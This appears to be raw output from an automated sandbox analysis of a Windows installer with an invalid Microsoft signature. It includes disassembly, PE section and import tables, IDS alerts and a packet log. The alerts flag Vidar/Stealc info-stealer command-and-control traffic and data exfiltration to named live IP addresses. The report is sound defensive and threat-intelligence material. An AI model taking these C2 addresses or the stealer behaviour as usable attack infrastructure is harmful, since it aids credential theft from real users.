                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                  Signature Valid:false
                                                                                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                  Error Number:-2146869232
                                                                                                  Not Before, Not After
                                                                                                  • 24/04/2024 22:20:26 19/04/2025 22:20:26
                                                                                                  Subject Chain
                                                                                                  • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:EB1CAB20508C9A21DFB09B2075D0D0F8
                                                                                                  Thumbprint SHA-1:9AA38CA0F770AB0A44B553BCD390395BCEC61EB4
                                                                                                  Thumbprint SHA-256:4DCCE58A880975BFD0555B7BB6358D99792AD448E400A3F4E6704EF70D3EBE1B
                                                                                                  Serial:33000003DE6C778D9215F2E1960000000003DE
                                                                                                  Instruction
                                                                                                  sub esp, 000002D4h
                                                                                                  push ebx
                                                                                                  push ebp
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  push 00000020h
                                                                                                  xor ebp, ebp
                                                                                                  pop esi
                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                  mov dword ptr [esp+10h], 00409268h
                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                  call dword ptr [00408030h]
                                                                                                  push 00008001h
                                                                                                  call dword ptr [004080B4h]
                                                                                                  push ebp
                                                                                                  call dword ptr [004082C0h]
                                                                                                  push 00000008h
                                                                                                  mov dword ptr [00472EB8h], eax
                                                                                                  call 00007FE6C957192Bh
                                                                                                  push ebp
                                                                                                  push 000002B4h
                                                                                                  mov dword ptr [00472DD0h], eax
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push eax
                                                                                                  push ebp
                                                                                                  push 00409264h
                                                                                                  call dword ptr [00408184h]
                                                                                                  push 0040924Ch
                                                                                                  push 0046ADC0h
                                                                                                  call 00007FE6C957160Dh
                                                                                                  call dword ptr [004080B0h]
                                                                                                  push eax
                                                                                                  mov edi, 004C30A0h
                                                                                                  push edi
                                                                                                  call 00007FE6C95715FBh
                                                                                                  push ebp
                                                                                                  call dword ptr [00408134h]
                                                                                                  cmp word ptr [004C30A0h], 0022h
                                                                                                  mov dword ptr [00472DD8h], eax
                                                                                                  mov eax, edi
                                                                                                  jne 00007FE6C956EEFAh
                                                                                                  push 00000022h
                                                                                                  pop esi
                                                                                                  mov eax, 004C30A2h
                                                                                                  push esi
                                                                                                  push eax
                                                                                                  call 00007FE6C95712D1h
                                                                                                  push eax
                                                                                                  call dword ptr [00408260h]
                                                                                                  mov esi, eax
                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                  jmp 00007FE6C956EF83h
                                                                                                  push 00000020h
                                                                                                  pop ebx
                                                                                                  cmp ax, bx
                                                                                                  jne 00007FE6C956EEFAh
                                                                                                  add esi, 02h
                                                                                                  cmp word ptr [esi], bx
                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                  • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x5990 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd133e | 0x27a0 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x5990 | 0x5a00 | eb8c56433b1fc26513aefe9330c568d1 | False | 0.5465277777777777 | data | 5.641013138007415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfa000 | 0xf32 | 0x1000 | c95352ad28755beb67c38585c38266ee | False | 0.483642578125 | data | 5.059997097918888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4220 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.354759967453214
RT_ICON | 0xf6888 | 0x15d9 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0019667441444664
RT_ICON | 0xf7e68 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.4382969034608379
RT_ICON | 0xf8f90 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5833333333333334
RT_DIALOG | 0xf93f8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xf94f8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xf9618 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xf9678 | 0x3e | data | English | United States | 0.8064516129032258
RT_MANIFEST | 0xf96b8 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T19:58:18.595071+0200 | TCP | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 443 | 49715 | 5.75.212.60 | 192.168.2.5
2024-07-26T19:58:48.364414+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49733 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:17.933745+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49715 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:40.259772+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49728 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:28.934319+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49722 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:16.599098+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49714 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:25.836622+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49720 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:34.371651+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49725 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:47.016652+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49732 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:29.673364+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 49722 | 5.75.212.60 | 192.168.2.5
2024-07-26T19:58:42.938290+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49730 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:41.583181+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49729 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:39.089459+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49727 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:49.953417+0200 | TCP | 2054495 | ET MALWARE Vidar Stealer Form Exfil | 49734 | 80 | 192.168.2.5 | 77.91.101.71
2024-07-26T19:58:27.179495+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49721 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:30.758808+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49723 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:23.676169+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49718 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:15.923488+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 49711 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:19.322610+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49716 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:17.256726+0200 | TCP | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 443 | 49714 | 5.75.212.60 | 192.168.2.5
2024-07-26T19:58:22.600438+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 49717 | 5.75.212.60 | 192.168.2.5
2024-07-26T19:58:15.159939+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49711 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:45.001633+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49731 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:13.854105+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49707 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:12.758336+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49705 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:20.614117+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49717 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:35.938833+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49726 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:32.652835+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49724 | 443 | 192.168.2.5 | 5.75.212.60
2024-07-26T19:58:52.838130+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49735 | 52.165.165.26 | 192.168.2.5
2024-07-26T19:58:14.504211+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49706 | 52.165.165.26 | 192.168.2.5
2024-07-26T19:58:24.742835+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49719 | 443 | 192.168.2.5 | 5.75.212.60
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                  Jul 26, 2024 19:58:13.202009916 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:13.202254057 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:13.202266932 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:13.853924990 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:13.854104996 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:13.854372025 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:13.854381084 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:13.855771065 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:13.855777025 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:14.501840115 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:14.501907110 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.501926899 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:14.501977921 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.502165079 CEST49707443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.502178907 CEST443497075.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:14.504039049 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.504074097 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:14.504168034 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.504801989 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:14.504821062 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.159867048 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.159939051 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.160413027 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.160423040 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.162297964 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.162303925 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.923450947 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.923468113 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.923528910 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.923532009 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.923619986 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.923949003 CEST49711443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.923970938 CEST443497115.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.925240040 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.925317049 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:15.925457001 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.925694942 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:15.925725937 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:16.598731041 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:16.599097967 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:16.600837946 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:16.600863934 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:16.611656904 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:16.611670017 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.256444931 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.256470919 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.256515980 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.256577015 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.256612062 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.256634951 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.256691933 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.256953955 CEST49714443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.256985903 CEST443497145.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.258471012 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.258549929 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.258635998 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.258836985 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.258872032 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.933624029 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.933744907 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.934317112 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.934334040 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:17.935791969 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:17.935803890 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:18.594813108 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:18.594917059 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:18.595144987 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:18.595230103 CEST49715443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:18.595269918 CEST443497155.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:18.656177998 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:18.656249046 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:18.656347990 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:18.656536102 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:18.656569004 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.322449923 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.322609901 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.323317051 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.323345900 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.325176001 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.325186968 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.325256109 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.325275898 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.884052992 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.884088039 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.884273052 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.884463072 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.884466887 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.942090988 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.942224979 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.942255974 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.942282915 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:19.942303896 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.942328930 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.943093061 CEST49716443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:19.943124056 CEST443497165.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:20.614016056 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:20.614116907 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:20.656712055 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:20.656718969 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:20.658610106 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:20.658613920 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.045051098 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.045119047 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.045161963 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.045243979 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.045243979 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.045264006 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.045279026 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.045314074 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.075531960 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.075577021 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.075630903 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.075638056 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.075802088 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.075802088 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.141591072 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.141653061 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.141881943 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.141895056 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.141943932 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.171940088 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.171993017 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.172081947 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.172090054 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.172123909 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.172123909 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.209639072 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.209690094 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.209853888 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.209861994 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.209906101 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.234184980 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.234210014 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.234247923 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.234256029 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.234276056 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.234302044 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.262604952 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.262667894 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.262691021 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.262696981 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.262729883 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.262748957 CEST49717443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:21.285767078 CEST443497175.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:21.285814047 CEST443497175.75.212.60192.168.2.5
